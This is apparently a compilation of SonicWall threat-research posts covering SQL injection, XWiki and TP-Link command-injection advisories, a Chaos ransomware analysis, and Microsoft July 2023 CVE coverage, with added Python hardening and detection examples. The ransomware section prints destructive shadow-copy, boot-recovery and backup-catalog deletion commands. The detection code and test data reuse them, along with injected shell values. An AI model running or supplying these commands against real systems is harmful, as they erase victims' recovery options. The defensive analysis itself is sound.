Netgear ProSAFE NMS300 SQLi Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  The Netgear ProSAFE Network Management System (NMS300) is a centralized and comprehensive management application designed for network administrators. It enables them to discover, monitor, configure, and report on SNMP-based enterprise-class network devices. The Netgear Network Management System NMS300 provides insights into network elements, including third-party devices, and its web-based user interface simplifies the process of monitoring and administering an entire network.

  An SQL injection vulnerability has been reported in Netgear ProSafe NMS300. This vulnerability arises due to improper input validation in the getNodesByTopologyMapSearch component.

  A remote, authenticated attacker could exploit this vulnerability by sending a specially crafted request to the target server. Successful exploitation of this vulnerability could result in SQL injection or, in the worst-case scenario, remote code execution in the context of the SYSTEM user.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-38099.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.6 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  When a user navigates to the device list through the topology map search feature, an HTTP GET request is dispatched to the Request-URI “/topology.do?method=getDeviceListByDim”. Upon receipt of this request, the function TopologyMapController.getDeviceByDim() is invoked. This function displays the values of all devices identified in the preceding search request. Multiple parameter values are saved into different variables, with the ‘exclude’ parameter being of particular relevance to this vulnerability. The value for the ‘exclude’ parameter is stored in the ‘exclude’ variable.

  Following this, the NodeInfoDao.getNodesTopologyMapSearch() method is invoked, passing the ‘exclude’ variable’s value into the ‘equips’ variable. This function is responsible for constructing and running the SQL query needed to fetch the specified device list. The corresponding SQL query is stored as a string in the ‘sql’ variable:
  
  If the ‘equips’ value is not empty, the string " and nodeId not in (equips) " is appended to the ‘sql’ string, with equips replaced by the raw value of the ‘equips’ variable. The query held in ‘sql’ is then executed and its result returned. Because the value is concatenated into the query text rather than bound as a parameter, whatever the caller places in the ‘exclude’ parameter is interpreted as SQL.
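As an added example (not from the advisory and not Netgear's code), the following Python mirrors the query-building pattern described above and sets a hardened version beside it: the exclude list is accepted only as a comma-separated list of integer node ids and is bound through placeholders instead of being concatenated into the query text. The table name, column names and sample rows are assumptions, and the constructed data runs in an in-memory SQLite database.

```python
import re
import sqlite3
from typing import List, Tuple

# Constructed sample rows standing in for the NMS300 node table (assumed schema).
SAMPLE_NODES = [(1, "core-sw-1"), (2, "edge-sw-2"), (3, "ap-lobby"), (4, "printer-3f")]

# Only a comma-separated list of integer ids is accepted, surrounding whitespace allowed.
_ID_LIST = re.compile(r"^\s*\d+(\s*,\s*\d+)*\s*$")


def build_sql_unsafe(equips: str) -> str:
    """Mirror of the flawed pattern in the advisory: the raw 'exclude' value
    is pasted straight into the query text."""
    sql = "SELECT nodeId, nodeName FROM nodes WHERE 1=1"
    if equips:
        sql += " and nodeId not in (" + equips + ") "
    return sql


def parse_exclude(equips: str) -> List[int]:
    """Validate before the value can reach any query builder."""
    if not equips:
        return []
    if not _ID_LIST.match(equips):
        raise ValueError("exclude must be a comma-separated list of integer node ids")
    return [int(tok) for tok in equips.split(",")]


def is_valid_exclude(equips: str) -> bool:
    try:
        parse_exclude(equips)
        return True
    except ValueError:
        return False


def build_sql_safe(equips: str) -> Tuple[str, List[int]]:
    """Hardened form: one '?' placeholder per validated id, ids passed separately."""
    ids = parse_exclude(equips)
    sql = "SELECT nodeId, nodeName FROM nodes WHERE 1=1"
    if ids:
        sql += " AND nodeId NOT IN (" + ",".join("?" * len(ids)) + ")"
    return sql, ids


def get_nodes(equips: str) -> List[Tuple[int, str]]:
    """Run the hardened query against the constructed in-memory table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE nodes (nodeId INTEGER PRIMARY KEY, nodeName TEXT)")
    conn.executemany("INSERT INTO nodes VALUES (?, ?)", SAMPLE_NODES)
    sql, params = build_sql_safe(equips)
    rows = conn.execute(sql + " ORDER BY nodeId", params).fetchall()
    conn.close()
    return rows


if __name__ == "__main__":
    print(get_nodes("2,4"))
    print(build_sql_unsafe("2) or (1=1"))   # raw text passes straight through
    print(is_valid_exclude("2) or (1=1"))   # the hardened path rejects it
```

Rejecting the value before it reaches the query builder matters as much as the placeholders: a NOT IN list cannot be expressed as a single bound parameter, so the placeholder string is generated from the count of ids that already passed validation.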

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network access to the vulnerable software.
  • The attacker must have permission to view the device list via the Topology map search component.

Triggering Conditions:

  The vulnerability is triggered when the server receives and processes an HTTP request whose ‘exclude’ parameter carries embedded SQL.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS
  What a successful GET Request might look like:
  

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 4001 NETGEAR ProSAFE NMS300 SQL Injection

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor-supplied patch to eliminate this vulnerability.
    • Filtering traffic based on the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

A new variant from Chaos Ransomware family surfaces

The SonicWall Capture Labs Research team has received a sample of a new variant of the Chaos ransomware family. Chaos is a customizable ransomware builder that emerged on underground forums, falsely marketed as the .NET version of Ryuk.

The builder exposes the following options, which a cybercriminal can set to customize the resulting ransomware:

  • processName = "svchost.exe";
  • sleepTextbox = 10;
  • spreadName = "surprise.exe";
  • userDir = "C:\\Users\\";
  • checkAdminPrivilage = true;
  • checkCopyRoaming = true;
  • checkdeleteBackupCatalog = true;
  • checkdeleteShadowCopies = true;
  • checkdisableRecoveryMode = true;
  • checkSleep = false;
  • checkSpread = true;
  • checkStartupFolder = true;
  • droppedMessageTextbox = "read_it.txt";
  • encryptedFileExtension = "";
  • encryptionAesRsa = true;
  • messages = new string[]; // ransom note content

Infection Cycle:

At the start of execution, it checks its own filename and the location from which it is running.

If the process name and location are not %appdata%\\svchost.exe, it drops a copy of itself to %appdata%\\svchost.exe and launches that copy.

It then checks the “checkSleep” flag supplied when the ransomware was built. If the value is false, it skips the sleepOutOfTempFolder() function. That function also checks the folder from which the sample is running; if the path does not match, it takes the “sleepTextbox” count, multiplies it by 1000 and passes the result to a thread that sleeps for that many milliseconds.

It then checks the checkStartupFolder flag and, if it is true, calls the addLinkToStartup() function.

This function creates a file named svchost.url containing the location of the executable and copies it into the user’s Startup folder, so that the malware runs automatically at every system startup.

It holds a hardcoded list of directories; only files in those directories that have one of the valid extensions are encrypted.

List of the extensions:

Before encrypting a file, it checks that the extension is in the list of valid extensions and that the filename is not the one given in droppedMessageTextbox when the ransomware was built.

droppedMessageTextbox holds the name of the file that will contain the ransom message; in this sample the filename is “read_it.txt”.

Before encrypting a file, it also checks the file length. If the length is below 2,117,152 bytes, the file is encrypted with the EncryptFile method; if the size is bigger than 2,117,152 bytes, a random string of random length between 200000000 and 300000000 bytes is generated and encoded with the randomEncode method.

It creates a 20-byte random password and converts it to a byte array using UTF-8 encoding. The file content is AES-encrypted with that key, and the key is then encrypted using RSA.

The AES-encrypted content is additionally Base64-encoded.

It then writes the RSA-encrypted key concatenated with the Base64-encoded content back into the file using the File.WriteAllText method.

Finally, the original file is moved to the same location with a random extension appended, generated by the RandomStringForExtension method, and “read_it.txt” containing the ransom message is dropped in that location.

Once encryption is done, it deletes shadow copies, disables recovery mode and deletes the backup catalog using the commands below.

"vssadmin delete shadows /all /quiet & wmic shadowcopy delete"
"bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no"
"wbadmin delete catalog -quiet"

To spread, it loops through all available drives on the system; if a drive is not the C:\ drive and the spreadName file is not already present on it, it copies the malware’s file to that drive under the specified spreadName.

In this way the malware can potentially infect other machines whose drives are mapped on the victim’s machine.
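The behaviours described above (the %appdata%\svchost.exe copy, the svchost.url startup link and the three anti-recovery command lines) are what a detection engineer would look for in process-creation and file-creation telemetry. The following Python is an added example, not part of the SonicWall write-up or of the sample itself; the rule names, the event field names and the sample events are constructed.

```python
import re
from typing import Dict, List, Tuple

# Command lines taken from the write-up's description of the sample. The
# labels and the telemetry field names (image, command_line, target_file)
# are assumptions modelled loosely on process/file-creation events.
ANTI_RECOVERY = [
    ("shadow-copy-deletion", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("shadow-copy-deletion", re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("boot-failure-ignored", re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures", re.I)),
    ("recovery-disabled", re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no", re.I)),
    ("backup-catalog-deletion", re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
]
# %appdata% expands to C:\Users\<user>\AppData\Roaming; the genuine svchost.exe lives in System32.
APPDATA_SVCHOST = re.compile(r"\\AppData\\Roaming\\svchost\.exe$", re.I)
# The startup link the sample writes to persist across reboots.
STARTUP_URL = re.compile(r"\\Start Menu\\Programs\\Startup\\svchost\.url$", re.I)


def triage_event(event: Dict[str, str]) -> List[str]:
    """Return the Chaos-like behaviours seen in one telemetry event (deduplicated)."""
    findings: List[str] = []
    cmd = event.get("command_line", "")
    for label, pattern in ANTI_RECOVERY:
        if pattern.search(cmd) and label not in findings:
            findings.append(label)
    if APPDATA_SVCHOST.search(event.get("image", "")):
        findings.append("svchost-outside-system32")
    if STARTUP_URL.search(event.get("target_file", "")):
        findings.append("startup-url-persistence")
    return findings


def triage_all(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index and findings for every event that matched at least one rule."""
    return [(i, f) for i, e in enumerate(events) if (f := triage_event(e))]


# Constructed sample telemetry, not captured from a real host.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"image": r"C:\Users\alice\AppData\Roaming\svchost.exe",
     "command_line": r"C:\Users\alice\AppData\Roaming\svchost.exe"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c wbadmin delete catalog -quiet"},
    {"image": r"C:\Users\alice\AppData\Roaming\svchost.exe",
     "target_file": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url"},
]

if __name__ == "__main__":
    for index, findings in triage_all(SAMPLE_EVENTS):
        print(index, findings)
```

The anti-recovery commands are the highest-value signal here: they are rarely run by legitimate software in that combination, so a rule that fires on any one of them on a workstation deserves a near-immediate look, while the svchost.exe path check catches the sample before encryption starts.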

Once encryption is complete, it displays the ransom message text.

It sets the wallpaper shown below.

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV:MalAgent.RSM_99 (Ransomware)

XWiki RCE Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  XWiki is recognized as a second-generation wiki platform, bringing together the conventional wiki functionality and the unique potential of an application development platform. It showcases a broad array of features typical of a wiki, such as advanced access rights and effective user management. Additionally, XWiki’s defining trait lies in its capacity to allow the creation of new applications, which can be developed directly on top of the platform.

  A remote code execution vulnerability has recently been reported in XWiki. It stems from improper handling of documentTree macro parameters: because these parameters are not properly escaped, the platform is exposed to external input that should have been neutralized.

  A remote attacker can exploit this vulnerability by sending specially crafted requests to the server hosting XWiki. If the attack succeeds, the attacker gains the ability to execute code remotely.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-29509.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.8 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  XWiki boasts a powerful scripting feature set, allowing users to create everything from simple to intricate web applications on an XWiki page (or view) layer. There is no need for users to compile code or deploy software components – instead, they can utilize scripting syntax alongside wiki markup directly within the content of an XWiki page.

  The platform supports a range of scripting languages, including Velocity, Groovy, and Python, all of which are enabled by default. XWiki incorporates the JSR-223 scripting platform, which facilitates the evaluation of script code. Additionally, XWiki utilizes a script macro that assesses script code and is structured as follows:

  

  To declare script code for default enabled languages, users can directly use the language name:

  

  The standard XWiki flavor includes the “Flamingo Theme Application” extension. This allows users to customize site skins, and the extension has a macro “FlamingoThemesCode.WebHome”. This macro lists the sub-documents of any given document. When a page request is made with the GET parameter sheet set to “FlamingoThemesCode.WebHome”, the same macro is used to render the page. The parameter document:$doc.documentReference is set to the current page, and this value is passed to the documentTree macro, which in turn lists the sub-documents of the present page.

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The target user must have network connectivity to the affected ports.

Triggering Conditions:

  The attacker requests a malicious page using the FlamingoThemesCode.WebHome view. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

  Get Request:
  
  URL Decoded:
  

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 2062 XWiki Commons documentTree Remote Code Execution 1
  • IPS: 18914 XWiki Commons documentTree Remote Code Execution 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Updating to a non-vulnerable version of the product.
    • Filtering attack traffic using the signatures above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

TP-Link Archer Command Injection Vulnerability

TP-Link is a company that specializes in manufacturing and selling networking products, including routers, switches, Wi-Fi range extenders, powerline adapters, access points, network adapters, and smart home devices. They provide reliable and affordable networking solutions for both home and business use.
The TP-Link Archer AX21 is a Wi-Fi 6 Dual-Band wireless router designed to deliver high-speed and reliable wireless connectivity for home networks.

TP-Link Archer AX21 Command Injection | CVE-2023-1389
TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 contain a command injection vulnerability in the web management interface.
The issue resides in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Due to inadequate sanitization of the country parameter in a write operation, an unauthenticated attacker could exploit the flaw using a simple POST request. By injecting malicious commands, the attacker could execute them as the root user, potentially gaining unauthorized access and control over the router.
The CVSS (Common Vulnerability Scoring System) score is 8.8 with CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

  • Attack vector is Adjacent.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

As seen in the exploit above, the vulnerable country parameter is used to download content from a URL with the ‘wget’ command. The vertical bar | pipes the output of one command into another; here the output of ‘wget’ is piped into ‘sh’, the shell, so the downloaded content is passed directly to the shell for execution. Because the command runs as the root user, the attacker can take over the router.
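As an added example (not from the write-up and not TP-Link firmware code), the following Python puts the flawed pattern, user input pasted into shell text, beside the hardened form, an allow-listed value passed as a single argv element, and adds a small check over url-encoded POST bodies that flags country values carrying shell metacharacters. The helper binary path, the form field names and the sample bodies are assumptions.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs

# Assumption: the only legitimate country values are two-letter ISO 3166-1 alpha-2 codes.
COUNTRY_RE = re.compile(r"^[A-Z]{2}$")
# Characters that let a value escape a shell command line: pipes, separators,
# redirects, backticks and $(...) substitution.
SHELL_META = re.compile(r"[|;&`<>\n]|\$\(")


def is_valid_country(value: str) -> bool:
    return bool(COUNTRY_RE.match(value))


def validate_country(value: str) -> str:
    """Allow-list check; reject rather than trying to strip bad characters."""
    if not is_valid_country(value):
        raise ValueError(f"rejected country value {value!r}")
    return value


def build_shell_line_unsafe(country: str) -> str:
    """Mirror of the flawed pattern: the raw value becomes part of shell text,
    so a '|' inside it starts a second command."""
    return "/usr/sbin/set-country --country " + country   # hypothetical helper


def build_argv(country: str) -> List[str]:
    """Hardened invocation: the validated value is one argv element, so no
    shell ever parses it (pass this list to subprocess.run without shell=True)."""
    return ["/usr/sbin/set-country", "--country", validate_country(country)]


def flag_country_requests(bodies: List[str]) -> List[Dict[str, object]]:
    """Detection over POST bodies: report every 'country' value that is not a
    clean two-letter code and note whether it carries shell metacharacters."""
    hits: List[Dict[str, object]] = []
    for body in bodies:
        params = parse_qs(body, keep_blank_values=True)
        for value in params.get("country", []):
            if not is_valid_country(value):
                hits.append({"body": body, "country": value,
                             "shell_meta": bool(SHELL_META.search(value))})
    return hits


# Constructed request bodies; the field names are assumptions.
SAMPLE_BODIES = [
    "operation=write&country=US",
    "operation=write&country=DE",
    "operation=write&country=US|echo injected",
    "operation=write&country=$(echo injected)",
    "operation=read",
]

if __name__ == "__main__":
    print(build_argv("US"))
    for hit in flag_country_requests(SAMPLE_BODIES):
        print(hit)
```

The argv form is the real fix: even if validation were incomplete, a value delivered as a separate argument cannot introduce a pipe or a second command, because no shell interprets it.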

SonicWall Capture Labs provides protection against this threat via the following signature:

  • IPS 15864: TP-Link Archer AX21 Command Injection

TP-Link has released firmware version 1.1.4 Build 20230219 which fixes this vulnerability.

Threat Graph

Microsoft Security Bulletin Coverage for July 2023

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2023. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2023-32046 Windows MSHTML Platform Elevation of Privilege Vulnerability
IPS 19225: Windows MSHTML Platform Elevation of Privilege (CVE-2023-32046) 1
IPS 19226: Windows MSHTML Platform Elevation of Privilege (CVE-2023-32046) 2

CVE-2023-33134 Microsoft SharePoint Server Remote Code Execution Vulnerability
IPS 3941: Microsoft SharePoint Server Remote Code Execution (CVE-2023-33134)

CVE-2023-33157 Microsoft SharePoint Remote Code Execution Vulnerability
IPS 3943: Microsoft SharePoint Remote Code Execution (CVE-2023-33157)

CVE-2023-35311 Microsoft Outlook Security Feature Bypass Vulnerability
ASPY 461: Exploit-exe exe.MP_330

CVE-2023-36874 Windows Error Reporting Service Elevation of Privilege Vulnerability
ASPY 462: Exploit-exe exe.MP_331

CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability
ASPY 463: Malformed-rtf rtf.MP_34

The following vulnerabilities do not have exploits in the wild:
CVE-2023-21526 Windows Netlogon Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21756 Windows Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-29347 Windows Admin Center Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-32033 Microsoft Failover Cluster Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32034 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32035 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32037 Windows Layer-2 Bridge Network Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32038 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32039 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32040 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32041 Windows Update Orchestrator Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32042 OLE Automation Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32043 Windows Remote Desktop Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-32044 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32045 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32047 Paint 3D Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32049 Windows SmartScreen Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-32050 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32051 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32052 Microsoft Power Apps Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-32053 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32054 Volume Shadow Copy Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32055 Active Template Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32056 Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32057 Microsoft Message Queuing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32083 Microsoft Failover Cluster Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32084 HTTP.sys Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32085 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-33127 .NET and Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33148 Microsoft Office Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33149 Microsoft Office Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33150 Microsoft Office Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-33151 Microsoft Outlook Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-33152 Microsoft ActiveX Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33153 Microsoft Outlook Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33154 Windows Partition Management Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33155 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33156 Microsoft Defender Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33158 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33159 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-33160 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33161 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33162 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-33163 Windows Network Load Balancing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33164 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33165 Microsoft SharePoint Server Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-33166 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33167 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33168 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33169 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33170 ASP.NET and Visual Studio Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-33171 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-33172 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33173 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33174 Windows Cryptographic Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35296 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35297 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35298 HTTP.sys Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35299 Windows Common Log File System Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35300 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35302 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35303 USB Audio Class System Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35304 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35305 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35306 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35308 Windows MSHTML Platform Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-35309 Microsoft Message Queuing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35310 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35312 Microsoft VOLSNAP.SYS Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35313 Windows Online Certificate Status Protocol (OCSP) SnapIn Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35314 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35315 Windows Layer-2 Bridge Network Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35316 Remote Procedure Call Runtime Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35317 Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35318 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35319 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35320 Connected User Experiences and Telemetry Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35321 Windows Deployment Services Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35322 Windows Deployment Services Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35323 Windows OLE Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35324 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35325 Windows Print Spooler Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35326 Windows CDP User Components Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35328 Windows Transaction Manager Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35329 Windows Authentication Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35330 Windows Extended Negotiation Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35331 Windows Local Security Authority (LSA) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35332 Windows Remote Desktop Protocol Security Feature Bypass
There are no known exploits in the wild.
CVE-2023-35333 MediaWiki PandocUpload Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35335 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-35336 Windows MSHTML Platform Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-35337 Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35338 Windows Peer Name Resolution Protocol Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35339 Windows CryptoAPI Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35340 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35341 Microsoft DirectMusic Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35342 Windows Image Acquisition Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35343 Windows Geolocation Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35344 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35345 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35346 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35347 Microsoft Store Install Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35348 Active Directory Federation Service Security Feature Bypass Vulnerability
There are no known exploits in the wild.
